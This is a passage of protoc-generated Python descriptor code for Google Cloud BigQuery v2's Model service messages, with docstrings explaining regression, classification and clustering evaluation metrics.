containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="training_runs",
full_name="google.cloud.bigquery.v2.Model.training_runs",
index=10,
number=9,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="feature_columns",
full_name="google.cloud.bigquery.v2.Model.feature_columns",
index=11,
number=10,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="label_columns",
full_name="google.cloud.bigquery.v2.Model.label_columns",
index=12,
number=11,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_MODEL_REGRESSIONMETRICS,
_MODEL_AGGREGATECLASSIFICATIONMETRICS,
_MODEL_BINARYCLASSIFICATIONMETRICS,
_MODEL_MULTICLASSCLASSIFICATIONMETRICS,
_MODEL_CLUSTERINGMETRICS,
_MODEL_EVALUATIONMETRICS,
_MODEL_TRAININGRUN,
_MODEL_LABELSENTRY,
],
enum_types=[
_MODEL_MODELTYPE,
_MODEL_LOSSTYPE,
_MODEL_DISTANCETYPE,
_MODEL_DATASPLITMETHOD,
_MODEL_LEARNRATESTRATEGY,
_MODEL_OPTIMIZATIONSTRATEGY,
],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=327,
serialized_end=6027,
)
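# Descriptors for the ModelService request/response messages
# (GetModelRequest, PatchModelRequest, DeleteModelRequest,
# ListModelsRequest, ListModelsResponse).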
_GETMODELREQUEST = _descriptor.Descriptor(
name="GetModelRequest",
full_name="google.cloud.bigquery.v2.GetModelRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.GetModelRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.GetModelRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_id",
full_name="google.cloud.bigquery.v2.GetModelRequest.model_id",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6029,
serialized_end=6104,
)
_PATCHMODELREQUEST = _descriptor.Descriptor(
name="PatchModelRequest",
full_name="google.cloud.bigquery.v2.PatchModelRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.PatchModelRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.PatchModelRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_id",
full_name="google.cloud.bigquery.v2.PatchModelRequest.model_id",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model",
full_name="google.cloud.bigquery.v2.PatchModelRequest.model",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6106,
serialized_end=6231,
)
_DELETEMODELREQUEST = _descriptor.Descriptor(
name="DeleteModelRequest",
full_name="google.cloud.bigquery.v2.DeleteModelRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.DeleteModelRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.DeleteModelRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_id",
full_name="google.cloud.bigquery.v2.DeleteModelRequest.model_id",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6233,
serialized_end=6311,
)
_LISTMODELSREQUEST = _descriptor.Descriptor(
name="ListModelsRequest",
full_name="google.cloud.bigquery.v2.ListModelsRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.ListModelsRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.ListModelsRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="max_results",
full_name="google.cloud.bigquery.v2.ListModelsRequest.max_results",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_token",
full_name="google.cloud.bigquery.v2.ListModelsRequest.page_token",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6314,
serialized_end=6444,
)
_LISTMODELSRESPONSE = _descriptor.Descriptor(
name="ListModelsResponse",
full_name="google.cloud.bigquery.v2.ListModelsResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="models",
full_name="google.cloud.bigquery.v2.ListModelsResponse.models",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="next_page_token",
full_name="google.cloud.bigquery.v2.ListModelsResponse.next_page_token",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6446,
serialized_end=6540,
)
_MODEL_REGRESSIONMETRICS.fields_by_name[
"mean_absolute_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.fields_by_name[
"mean_squared_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.fields_by_name[
"mean_squared_log_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.fields_by_name[
"median_absolute_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.fields_by_name[
"r_squared"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.containing_type = _MODEL
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"precision"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"recall"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"accuracy"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"threshold"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"f1_score"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"log_loss"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"roc_auc"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.containing_type = _MODEL
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"positive_class_threshold"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"true_positives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"false_positives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"true_negatives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"false_negatives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"precision"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"recall"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"f1_score"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"accuracy"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.containing_type = (
_MODEL_BINARYCLASSIFICATIONMETRICS
)
_MODEL_BINARYCLASSIFICATIONMETRICS.fields_by_name[
"aggregate_classification_metrics"
].message_type = _MODEL_AGGREGATECLASSIFICATIONMETRICS
_MODEL_BINARYCLASSIFICATIONMETRICS.fields_by_name[
"binary_confusion_matrix_list"
].message_type = _MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX
_MODEL_BINARYCLASSIFICATIONMETRICS.containing_type = _MODEL
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY.fields_by_name[
"item_count"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY.containing_type = (
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW.fields_by_name[
"entries"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW.containing_type = (
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX.fields_by_name[
"confidence_threshold"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX.fields_by_name[
"rows"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX.containing_type = (
_MODEL_MULTICLASSCLASSIFICATIONMETRICS
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS.fields_by_name[
"aggregate_classification_metrics"
].message_type = _MODEL_AGGREGATECLASSIFICATIONMETRICS
_MODEL_MULTICLASSCLASSIFICATIONMETRICS.fields_by_name[
"confusion_matrix_list"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX
_MODEL_MULTICLASSCLASSIFICATIONMETRICS.containing_type = _MODEL
_MODEL_CLUSTERINGMETRICS.fields_by_name[
"davies_bouldin_index"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_CLUSTERINGMETRICS.fields_by_name[
"mean_squared_distance"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_CLUSTERINGMETRICS.containing_type = _MODEL
_MODEL_EVALUATIONMETRICS.fields_by_name[
"regression_metrics"
].message_type = _MODEL_REGRESSIONMETRICS
_MODEL_EVALUATIONMETRICS.fields_by_name[
"binary_classification_metrics"
].message_type = _MODEL_BINARYCLASSIFICATIONMETRICS
_MODEL_EVALUATIONMETRICS.fields_by_name[
"multi_class_classification_metrics"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS
_MODEL_EVALUATIONMETRICS.fields_by_name[
"clustering_metrics"
].message_type = _MODEL_CLUSTERINGMETRICS
_MODEL_EVALUATIONMETRICS.containing_type = _MODEL
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["regression_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"regression_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["binary_classification_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"binary_classification_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["multi_class_classification_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"multi_class_classification_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["clustering_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"clustering_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY.containing_type = (
_MODEL_TRAININGRUN_TRAININGOPTIONS
)
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"loss_type"
].enum_type = _MODEL_LOSSTYPE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"l1_regularization"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"l2_regularization"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"min_relative_progress"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"warm_start"
].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"early_stop"
].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"data_split_method"
].enum_type = _MODEL_DATASPLITMETHOD
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"learn_rate_strategy"
].enum_type = _MODEL_LEARNRATESTRATEGY
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"label_class_weights"
].message_type = _MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"distance_type"
].enum_type = _MODEL_DISTANCETYPE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"optimization_strategy"
].enum_type = _MODEL_OPTIMIZATIONSTRATEGY
_MODEL_TRAININGRUN_TRAININGOPTIONS.containing_type = _MODEL_TRAININGRUN
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO.fields_by_name[
"cluster_radius"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO.fields_by_name[
"cluster_size"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO.containing_type = (
_MODEL_TRAININGRUN_ITERATIONRESULT
)
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"index"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"duration_ms"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"training_loss"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"eval_loss"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"cluster_infos"
].message_type = _MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO
_MODEL_TRAININGRUN_ITERATIONRESULT.containing_type = _MODEL_TRAININGRUN
_MODEL_TRAININGRUN.fields_by_name[
"training_options"
].message_type = _MODEL_TRAININGRUN_TRAININGOPTIONS
_MODEL_TRAININGRUN.fields_by_name[
"start_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_MODEL_TRAININGRUN.fields_by_name[
"results"
].message_type = _MODEL_TRAININGRUN_ITERATIONRESULT
_MODEL_TRAININGRUN.fields_by_name[
"evaluation_metrics"
].message_type = _MODEL_EVALUATIONMETRICS
_MODEL_TRAININGRUN.containing_type = _MODEL
_MODEL_LABELSENTRY.containing_type = _MODEL
_MODEL.fields_by_name[
"model_reference"
].message_type = (
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_model__reference__pb2._MODELREFERENCE
)
_MODEL.fields_by_name["labels"].message_type = _MODEL_LABELSENTRY
_MODEL.fields_by_name["model_type"].enum_type = _MODEL_MODELTYPE
_MODEL.fields_by_name["training_runs"].message_type = _MODEL_TRAININGRUN
_MODEL.fields_by_name[
"feature_columns"
].message_type = (
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2._STANDARDSQLFIELD
)
_MODEL.fields_by_name[
"label_columns"
].message_type = (
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2._STANDARDSQLFIELD
)
_MODEL_MODELTYPE.containing_type = _MODEL
_MODEL_LOSSTYPE.containing_type = _MODEL
_MODEL_DISTANCETYPE.containing_type = _MODEL
_MODEL_DATASPLITMETHOD.containing_type = _MODEL
_MODEL_LEARNRATESTRATEGY.containing_type = _MODEL
_MODEL_OPTIMIZATIONSTRATEGY.containing_type = _MODEL
_PATCHMODELREQUEST.fields_by_name["model"].message_type = _MODEL
_LISTMODELSREQUEST.fields_by_name[
"max_results"
].message_type = google_dot_protobuf_dot_wrappers__pb2._UINT32VALUE
_LISTMODELSRESPONSE.fields_by_name["models"].message_type = _MODEL
DESCRIPTOR.message_types_by_name["Model"] = _MODEL
DESCRIPTOR.message_types_by_name["GetModelRequest"] = _GETMODELREQUEST
DESCRIPTOR.message_types_by_name["PatchModelRequest"] = _PATCHMODELREQUEST
DESCRIPTOR.message_types_by_name["DeleteModelRequest"] = _DELETEMODELREQUEST
DESCRIPTOR.message_types_by_name["ListModelsRequest"] = _LISTMODELSREQUEST
DESCRIPTOR.message_types_by_name["ListModelsResponse"] = _LISTMODELSRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Model = _reflection.GeneratedProtocolMessageType(
"Model",
(_message.Message,),
dict(
RegressionMetrics=_reflection.GeneratedProtocolMessageType(
"RegressionMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_REGRESSIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for regression models.
Attributes:
mean_absolute_error:
Mean absolute error.
mean_squared_error:
Mean squared error.
mean_squared_log_error:
Mean squared log error.
median_absolute_error:
Median absolute error.
r_squared:
R^2 score.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.RegressionMetrics)
),
),
AggregateClassificationMetrics=_reflection.GeneratedProtocolMessageType(
"AggregateClassificationMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_AGGREGATECLASSIFICATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Aggregate metrics for classification/classifier models. For multi-class
models, the metrics are either macro-averaged or micro-averaged. When
macro-averaged, the metrics are calculated for each label and then an
unweighted average is taken of those values. When micro-averaged, the
metric is calculated globally by counting the total number of correctly
predicted rows.
Attributes:
precision:
Precision is the fraction of actual positive predictions that
had positive actual labels. For multiclass this is a macro-
averaged metric treating each class as a binary classifier.
recall:
Recall is the fraction of actual positive labels that were
given a positive prediction. For multiclass this is a macro-
averaged metric.
accuracy:
Accuracy is the fraction of predictions given the correct
label. For multiclass this is a micro-averaged metric.
threshold:
Threshold at which the metrics are computed. For binary
classification models this is the positive class threshold.
          For multi-class classification models this is the confidence
threshold.
f1_score:
The F1 score is an average of recall and precision. For
multiclass this is a macro-averaged metric.
log_loss:
Logarithmic Loss. For multiclass this is a macro-averaged
metric.
roc_auc:
Area Under a ROC Curve. For multiclass this is a macro-
averaged metric.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.AggregateClassificationMetrics)
),
),
BinaryClassificationMetrics=_reflection.GeneratedProtocolMessageType(
"BinaryClassificationMetrics",
(_message.Message,),
dict(
BinaryConfusionMatrix=_reflection.GeneratedProtocolMessageType(
"BinaryConfusionMatrix",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Confusion matrix for binary classification models.
Attributes:
positive_class_threshold:
Threshold value used when computing each of the following
          metrics.
true_positives:
Number of true samples predicted as true.
false_positives:
Number of false samples predicted as true.
true_negatives:
Number of true samples predicted as false.
false_negatives:
Number of false samples predicted as false.
precision:
The fraction of actual positive predictions that had positive
actual labels.
recall:
The fraction of actual positive labels that were given a
positive prediction.
f1_score:
The equally weighted average of recall and precision.
accuracy:
The fraction of predictions given the correct label.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix)
),
),
DESCRIPTOR=_MODEL_BINARYCLASSIFICATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for binary classification/classifier models.
Attributes:
aggregate_classification_metrics:
Aggregate classification metrics.
binary_confusion_matrix_list:
Binary confusion matrix at multiple thresholds.
positive_label:
Label representing the positive class.
negative_label:
Label representing the negative class.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.BinaryClassificationMetrics)
),
),
MultiClassClassificationMetrics=_reflection.GeneratedProtocolMessageType(
"MultiClassClassificationMetrics",
(_message.Message,),
dict(
ConfusionMatrix=_reflection.GeneratedProtocolMessageType(
"ConfusionMatrix",
(_message.Message,),
dict(
Entry=_reflection.GeneratedProtocolMessageType(
"Entry",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""A single entry in the confusion matrix.
Attributes:
predicted_label:
The predicted label. For confidence\_threshold > 0, we will
also add an entry indicating the number of items under the
confidence threshold.
item_count:
Number of items being predicted as this label.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry)
),
),
Row=_reflection.GeneratedProtocolMessageType(
"Row",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""A single row in the confusion matrix.
Attributes:
actual_label:
The original label of this row.
entries:
Info describing predicted label distribution.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row)
),
),
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Confusion matrix for multi-class classification models.
Attributes:
confidence_threshold:
Confidence threshold used when computing the entries of the
confusion matrix.
rows:
One row per actual label.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix)
),
),
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for multi-class classification/classifier models.
Attributes:
aggregate_classification_metrics:
Aggregate classification metrics.
confusion_matrix_list:
Confusion matrix at different thresholds.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics)
),
),
ClusteringMetrics=_reflection.GeneratedProtocolMessageType(
"ClusteringMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_CLUSTERINGMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for clustering models.
Attributes:
davies_bouldin_index:
Davies-Bouldin index.
mean_squared_distance:
Mean of squared distances between each sample to its cluster
centroid.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.ClusteringMetrics)
),
),
EvaluationMetrics=_reflection.GeneratedProtocolMessageType(
"EvaluationMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_EVALUATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics of a model. These are either computed on all training
data or just the eval data based on whether eval data was used during
